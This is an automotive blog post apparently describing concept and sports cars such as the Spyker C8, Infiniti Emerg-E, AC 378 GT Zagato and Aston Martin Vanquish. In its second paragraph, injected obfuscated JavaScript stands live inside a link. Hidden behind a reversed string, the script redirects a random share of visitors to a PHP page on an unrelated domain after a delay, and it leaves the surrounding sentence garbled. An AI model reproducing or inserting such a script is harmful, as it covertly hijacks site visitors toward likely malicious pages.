The boys who worked at the Spyker factory in the late 19th century may struggle to recognize this example. The Spyker Cars badge gives the game away sure, but the C8’s curvaceous yet aggressive contours are a far cry from the early-1900s C2 coachbuilder’s favourite. And with a 300kph top speed courtesy of the 394hp 4.2l V8, the London-to-Brighton Rally is a long way away.

Regular readers of crankandpiston may recognize this concept from this year’s $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/geneva-motor-show-2012-opening-day-c-through-p/” target=”_blank”>Geneva Motor Show. Yep, don’t let your eyes don’t deceive you: that really is an Infiniti badge. Out of the luxurious SUV and saloon world of Nissan’s luxury arm comes the new Emerg-E. Now even though a working prototype made its debut at Goodwood – complete with mid-engined three-cylinders and working hybrid system, which together produce 402bhp – Infiniti powers-that-be are remaining pretty tight-lipped on whether this model will ever reach production.

Already on its haunches on the start line, the AC 378 GT Zagato is a new player to the sportscar world, though that’s not to say it hasn’t poked its nose above the parapet already: during the two-seater’s original debut back in 2009, the AC was marketed as a Perana Z-One. Sales are due to commence at the end of 2012, and – thanks to the 437bhp 6.2l V8 engine from a Chevrolet Camaro – customers can look forward to a sub-4s 0-100kph time and a 297kph top speed. We’d advice you to take it easy with the loud pedal though, since the 378 GT has no electronic driver aids.

Another pretty high-profile attendee at Goodwood was the new Aston Martin Vanquish, and fortunately Madonna, 007 and an invisibility clock were nowhere to be seen. With sweeping headlights, subtly crafted air intakes and a remodeled front bumper, the Vanquish is certainly a looker. But the coupe’s hardly all looks and no trousers though: 565hp 5.9l V12, 295kph top speed and 0-100kph in 4.1s. We have yet to see the price tag, but we’re not crossing our fingers too hard.
